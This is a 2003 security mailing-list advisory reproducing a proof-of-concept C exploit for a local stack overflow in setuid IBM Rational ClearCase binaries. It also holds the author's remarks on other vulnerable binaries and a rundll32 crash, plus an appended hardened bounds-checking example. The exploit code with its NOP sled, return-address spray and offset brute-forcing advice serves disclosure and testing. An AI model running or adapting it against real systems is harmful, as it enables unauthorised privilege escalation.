[EXPL] Rational Clearcase Exploit Code Released
From: SecuriTeam (support_at_securiteam.com)
Date: 09/14/03
To: list@securiteam.com Date: 14 Sep 2003 18:33:40 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Rational Clearcase Exploit Code Released
------------------------------------------------------------------------
SUMMARY
IBM Rational ClearCase (http://www.rational.com/products/clearcase/prodinfo.jsp) "simplifies the process of change with a family of products that scales from small project workgroups to the distributed global enterprise". A locally exploitable stack overflow in the product's binaries allows a local user to gain elevated privileges. The following exploit code can be used to test your system for the vulnerability.
DETAILS
Exploit:
/*
****** Another Proof Of Concept Code by c0ntex@hushmail.com
******
**** Rational Clearcase Clearance ****
**********************
*
-------------------------------------------------------------------------------------
The definition of Rational in the dictionary:
Definition: [adj] having its source in or being guided by the intellect
(distinguished from experience or emotion); "a rational analysis"
[adj] of or associated with or requiring the use of the mind;
"intellectual
problems"; "the triumph of the rational over the animal side of man"
-------------------------------------------------------------------------------------
There are so far 10 separate binaries, including the ones below, that are vulnerable to some form of stack based attack. All architectures are vulnerable in some form too. It is also possible to own remote machines from the ClearCase binaries.
Is it a bug or a feature? Who cares, it's Friday :-)
[-] Vuln Binary              [-] Vuln Architectures               [-] Serious?
/usr/atria/bin/Perl          Intel, Alpha, RISC, Possible SPARC   Could be
/usr/atria/bin/notify        Intel, Alpha, RISC, Possible SPARC   Not really
/usr/atria/bin/cleartool     Intel, Alpha, RISC, Possible SPARC   Yeah
/usr/atria/etc/scrubber      Intel, Alpha, RISC, Possible SPARC   Yeah
/usr/atria/etc/mount_mvfs    Intel, Alpha, RISC, Possible SPARC   Yeah
/usr/atria/etc/imsglog       Intel, Alpha, RISC, Possible SPARC   Could be
/usr/atria/etc/Gzip          Intel, Alpha, RISC, Possible SPARC   Not really
... etc ...
Still to come: ALBD and MVFS / NFS encapsulation analysis. You may find that MVFS causes your NFS daemon to, well, react in adverse ways. :) Await a testing environment.
Anyone?
*******************
BOYCOTT ROOT GAINING EXPLOIT CODE SHARING
*******************
ALL linux SetUID binaries have a little bug too :-) RUN Forest, RUN, you might find it too *lol* // Funny priv8 joke ahha //
Want another funny priv8 joke?
-> http://www.wired.com/news/infostructure/0,1377,60391,00.html
Symantec are a funny bunch, they want to make exploit and tool codes illegal.
Ok sirs, may this humble hobbyist ask your good integrity driven self why you decide to purchase and fund a security related website that shares these same codes with the public socialist. You could perhaps also then answer why you also fund a security related website that is involved with people that have been known to `hack`, where the word hack is assumed to be in the same context used by the media monkey.
--
bash> file core.*
core.1230: ELF 32-bit LSB core file of 'su' (signal 11), Intel 80386, version 1 (SYSV), from 'su'
core.1233: ELF 32-bit LSB core file of 'crontab' (signal 11), Intel 80386, version 1 (SYSV), from 'crontab'
bash> su
Segmentation fault (core dumped)
bash> mount
mount: error while loading shared libraries: O: cannot open shared object file: No such file or directory
bash> PuTTY
-bash: PuTTY: command not found
bash> passwd
Segmentation fault (core dumped)
Still checking this out.
*******************
Oracle, now there is an application. It also has some stack based bug that can be abused by underpaid and overworked computer hobbyists; some PoC might be shared. Then again, it might not :)
Oracle and SNMP, what a lovely combination.
Oracle on Microsoft systems is funny too.
****************
Speaking of Microsoft, another little bug noticed was an overflow in a widespread *exe* called rundll32. Only useful for virii or something stupid like that anyway, right?
"!!ALERT!! No 0day patch for remote 0day XSS 0day" *LOL*, this is funny stuff man.
---------
Let us go back about 1 1/2 months.
Background: Being terribly bored with brain numbing talk on IRC I decided to play a great game called Counter Strike - have you played this game? I tell you, it is a very good game :) Come play some time, it is not a buggy application *HONEST*
You know what I mean, right?
"Description: The Windows Rundll32 Program is used to run DLLs as programs and is used by many programs to execute functions located in a DLL file."
The part that has been left out: rundll32 has been coded in such a way that it does not check user supplied input with a means of preventing user controlled buffer overflows.
rundll32.exe
Faulting application rundll32.exe, version 5.1.2600.0, faulting module unknown, version 0.0.0.0, fault address 0x000a000d.
Unicode EIP address = 00410041 = *LOL*
http://community.core-sdi.com/~juliano/unicodebo.pdf <--// Nice site fella :) //
You might say `who cares` about rundll32, he say "not he", but it would be rude not to let you know why windows machines shut down or have new user accounts.
After finding the bug I checked the google engine and found one post from a guy that noticed the same thing.
Hi guy :-)
-------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VER "ClearCase Smack_Crack_And_Hack_Attack Version 1.0.1"
#define NOP 0x90
#define RET 0xbfffd838
#define BUFF 1300

/* exit(0) shellcode: the PoC only demonstrates control of EIP, it does not spawn a shell */
char shellcode[] = "\x31\xc0\xfe\xc0\xcd\x80";
/*
8048091: 31 c0 xor %eax,%eax
8048093: fe c0 inc %al
8048095: cd 80 int $0x80
*/

int main(int argc, char *argv[]) {
    char buffer[BUFF + 1];          /* one extra byte so the argument is NUL-terminated */
    unsigned long int retaddr;
    long offset = 0;                /* signed, so the negative offsets in the usage text work */
    unsigned short int i;

    if(argc > 1) {
        offset = atol(argv[1]);
    }
    retaddr = RET + offset;

    printf("\n\n*************************************************************\n"
           "*************************************************************\n");
    printf("[-] %s\n", VER);
    printf("[-] Bug discovered and PoC developed by c0ntex@hushmail.com.\n"
           "[-] --------------------------------------------------------\n"
           "[-] with a little bit of copy & paste skill. Ok, Yes, it is\n"
           "[-] true, c0ntex also lazy perl scripter. :->\n"
           "[-] --------------------------------------------------------\n"
           "[-] If the added return address isn't working, brute force it.\n"
           "[-] Values from around -2000 -> +2000 should work quite well.\n"
           "[-] Or add a request to get current esp value and use that.\n"
           "[-] --------------------------------------------------------\n"
           "[-] Usage: %s offset_value\n", argv[0]);

    /* fill the whole buffer with the guessed return address */
    for(i = 0; i < BUFF; i += 4)
        *(long *) &buffer[i] = retaddr;
    /* overwrite the front with a NOP sled and place the shellcode after it */
    for(i = 0; i < (BUFF - strlen(shellcode) - 100); ++i)
        *(buffer + i) = NOP;
    memcpy(buffer + i, shellcode, strlen(shellcode));
    buffer[BUFF] = '\0';            /* terminate the argument string */

    printf("[-] Using Return address 0x%lx\n", retaddr);
    printf("[-] Using offset value %ld\n", offset);
    printf("*************************************************************\n"
           "*************************************************************\n\n");

    execlp("/usr/atria/bin/Perl", "Perl", buffer, (char *) NULL);
    return 0;
}
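The defect class behind this advisory, as an added example that is not part of the original post or of ClearCase: a privileged program copies an argument into a fixed stack buffer, and the hardened handler measures first and rejects anything that does not fit. ARG_LIMIT, the frame model and the SAVED_RET_MARKER value are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define ARG_LIMIT 255                   /* assumed bound: longest argument accepted */
#define SAVED_RET_MARKER 0x11223344UL   /* constructed stand-in for a real return address */

/* Models the stack frame of a setuid program: a fixed buffer followed by
 * the saved return address that an overflowing copy would overwrite. */
struct frame {
    char buf[ARG_LIMIT + 1];
    unsigned long saved_ret;
};

/* Defective pattern behind the advisory (deliberately not a function here):
 *     strcpy(f->buf, arg);
 * trusts argv and keeps writing past buf into saved_ret, which is why the
 * exploit above hands the binary 1300 bytes. */

/* Hardened handling: locate the terminator within the bound first, reject
 * anything longer, and copy only after the check passes. */
int accept_arg(struct frame *f, const char *arg) {
    const char *end = memchr(arg, '\0', ARG_LIMIT + 1);
    if (end == NULL)
        return -1;                      /* over-long: caller reports and exits */
    size_t len = (size_t)(end - arg);
    memcpy(f->buf, arg, len + 1);       /* includes the terminating NUL */
    return 0;
}

/* 1 when the modelled return address survived argument processing. */
int frame_intact(const struct frame *f) {
    return f->saved_ret == SAVED_RET_MARKER;
}

/* 0 = argument accepted, 1 = rejected as too long, 2 = frame corrupted. */
int run_wrapper(const char *arg) {
    struct frame f;
    memset(f.buf, 0, sizeof f.buf);
    f.saved_ret = SAVED_RET_MARKER;
    if (accept_arg(&f, arg) != 0)
        return 1;
    return frame_intact(&f) ? 0 : 2;
}

int main(int argc, char *argv[]) {
    int rc = run_wrapper(argc > 1 ? argv[1] : "");
    if (rc == 1) fprintf(stderr, "argument longer than %d bytes rejected\n", ARG_LIMIT);
    return rc;
}
```

Where a listed binary does not need the setuid bit for its job, removing the bit also removes the privilege escalation even while the overflow itself remains unpatched.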
ADDITIONAL INFORMATION
The information has been provided by c0ntex (c0ntex@hushmail.com).